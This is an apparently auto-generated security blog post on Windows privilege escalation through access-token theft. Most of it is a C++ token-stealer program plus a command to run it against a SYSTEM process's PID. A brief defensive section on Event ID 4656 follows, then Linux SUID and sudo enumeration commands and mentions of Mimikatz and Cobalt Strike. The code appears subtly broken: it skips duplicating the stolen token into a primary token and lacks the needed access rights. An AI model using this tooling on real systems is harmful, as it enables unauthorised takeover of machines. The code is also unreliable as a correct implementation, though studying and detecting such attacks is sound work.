Red Team Scenario: Privilege Escalation via Access Token Manipulation

By /

Listen to this Post

2025-02-15

Elevating privileges from a user to an administrator level is challenging, but escalating from an administrator to SYSTEM level is even more complex. One effective method for this is the Access Token Manipulation Attack. When you log into a Windows machine, the system creates a token containing your security identifier (SID), discretionary access control list (DACL), logon sessions, and other details. By manipulating this token, you can escalate privileges.

I’ve developed a program to demonstrate this attack. Below are the key functions and commands used:

Key Functions:

  1. BOOL SetPrivilege(LPCTSTR priv): Enables specific privileges like `SE_DEBUG_NAME` for the current process.
  2. HANDLE GetToken(DWORD pid): Retrieves the access token from a target process using its Process ID (PID).
  3. BOOL CreateElevatedProcess(HANDLE token, LPCWSTR appPath): Creates a new process using a duplicated token.

Code Snippet:

#include <windows.h>
#include <iostream>

BOOL SetPrivilege(LPCTSTR priv) {
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return FALSE;

TOKEN_PRIVILEGES tkp;
if (!LookupPrivilegeValue(NULL, priv, &tkp.Privileges[0].Luid))
return FALSE;

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL);
return GetLastError() == ERROR_SUCCESS;
}

HANDLE GetToken(DWORD pid) {
HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, TRUE, pid);
if (hProcess == NULL)
return NULL;

HANDLE hToken;
if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &hToken))
return NULL;

return hToken;
}

BOOL CreateElevatedProcess(HANDLE token, LPCWSTR appPath) {
STARTUPINFOW si = { sizeof(si) };
PROCESS_INFORMATION pi;

return CreateProcessAsUserW(token, NULL, appPath, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}

Execution:

To execute the program, run the token stealer with the PID of any process running under SYSTEM privilege. Use the following command:

./token_stealer.exe <PID>

Blue Team Scenario:

As a Blue Teamer, monitor Event ID 4656 in Windows logs. This event is triggered when a handle to an object is requested with an access mask. The `OpenProcess()` function with `PROCESS_QUERY_LIMITED_INFORMATION` (access mask 0x1000) is a key indicator of this attack.

What Undercode Say:

Privilege escalation attacks like token manipulation are critical threats in cybersecurity. Understanding both offensive and defensive techniques is essential for robust security. Here are some additional commands and tools to enhance your skills:

1. Linux Privilege Escalation:

  • Use `sudo -l` to check sudo permissions.
  • Exploit SUID binaries with find / -perm -u=s -type f 2>/dev/null.

2. Windows Commands:

  • Use `whoami /priv` to check current privileges.
  • Monitor logs with Get-WinEvent -LogName Security | Where-Object { $_.ID -eq 4656 }.

3. Tools:

  • Mimikatz: Extract tokens and credentials.
  • Sysinternals Suite: Analyze processes and tokens.

4. Practice:

  • Set up a lab environment using VirtualBox or VMware.
  • Practice with tools like Metasploit and Cobalt Strike.

For further reading, visit:

By mastering these techniques, you can better defend against advanced attacks and strengthen your cybersecurity posture.

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts: